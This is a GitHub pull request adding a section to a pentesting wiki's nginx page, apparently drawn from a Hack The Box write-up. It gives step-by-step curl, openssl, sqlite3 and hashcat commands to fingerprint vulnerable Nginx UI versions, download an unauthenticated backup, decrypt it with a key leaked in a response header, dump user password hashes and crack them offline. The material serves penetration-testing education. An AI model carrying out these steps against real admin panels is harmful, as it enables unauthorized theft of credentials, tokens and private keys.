Skip to content

HTB Snapped #2081

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
+56 −0
Open

HTB Snapped #2081

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions src/network-services-pentesting/pentesting-web/nginx.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -379,6 +379,59 @@ rg -n "keepalive_requests" /etc/nginx/

Hosts that reveal unusually high values for those directives are prime targets: one HTTP/2 client can loop through stream creation and instant `RST_STREAM` frames to keep CPU pegged without tripping the concurrency cap.

## Nginx UI pre-auth backup export + crypto material leakage

**Nginx UI** is a separate admin panel for nginx, not the nginx daemon itself. In **Nginx UI < 2.3.3**, the backup export endpoint may be reachable **without authentication** and the response can also leak the **AES-256-CBC key and IV** needed to decrypt the backup via the `X-Backup-Security` header. This turns an "encrypted backup download" into immediate **credential / token / private-key disclosure**.

### Fast version fingerprinting from SPA assets

If the login page is a JS-heavy SPA, pull the main bundle from `/` and look for a dedicated version chunk:

```bash
curl -s http://admin.example/ | grep -oP 'assets/index-[^"]+\.js'
curl -s http://admin.example/assets/index-<hash>.js | grep -oP 'version[-\\w]*\\.js'
curl -s http://admin.example/assets/version-<hash>.js
```

On vulnerable Nginx UI builds this often returns a literal such as `const t="2.3.2"`, which is enough to match the vulnerable range before authenticating.

### Check exposed API endpoints and pull the backup

Even when most `/api/*` routes return `403`, test backup-style endpoints directly:

```bash
curl -s http://admin.example/api/install
curl -s -D headers.txt -o backup.zip http://admin.example/api/backup
grep -i '^X-Backup-Security:' headers.txt
unzip -l backup.zip
```

If vulnerable, `X-Backup-Security` contains `base64(key):base64(iv)`. Decode both values and confirm the expected lengths (**32-byte key**, **16-byte IV**):

```bash
KEY_B64='<base64-key>'; IV_B64='<base64-iv>'
KEY_HEX=$(printf '%s' "$KEY_B64" | base64 -d | xxd -p -c 0)
IV_HEX=$(printf '%s' "$IV_B64" | base64 -d | xxd -p -c 0)
unzip backup.zip -d backup
openssl enc -aes-256-cbc -d -in backup/hash_info.txt -out hash_info.txt -K "$KEY_HEX" -iv "$IV_HEX"
openssl enc -aes-256-cbc -d -in backup/nginx.zip -out nginx_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
openssl enc -aes-256-cbc -d -in backup/nginx-ui.zip -out nginx-ui_dec.zip -K "$KEY_HEX" -iv "$IV_HEX"
```

After decryption, inspect the recovered nginx configs and the Nginx UI application data. A common post-exploitation path is:

- Extract reverse-proxy and vhost details from `nginx_dec.zip`
- Inspect `nginx-ui_dec.zip` for `app.ini`, `database.db`, API tokens, or certificate material
- Dump the SQLite `users` table and crack recovered password hashes offline

```bash
unzip nginx-ui_dec.zip -d nginx-ui
sqlite3 nginx-ui/database.db 'select name,password from users;'
hashcat -m 3200 hashes.txt <wordlist>
```

This pattern is worth testing in other admin products too: **an unauthenticated "encrypted" export is still plaintext disclosure if the response leaks the decryption material or stores it alongside the archive.**

## Try it yourself

Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself!
Expand All @@ -405,6 +458,9 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne
- [**https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html**](https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html)
- [**https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html**](https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html)
- [**https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products**](https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products)
- [**https://0xdf.gitlab.io/2026/04/01/htb-snapped.html**](https://0xdf.gitlab.io/2026/04/01/htb-snapped.html)
- [**https://nvd.nist.gov/vuln/detail/CVE-2026-27944**](https://nvd.nist.gov/vuln/detail/CVE-2026-27944)
- [**https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762**](https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762)


{{#include ../../banners/hacktricks-training.md}}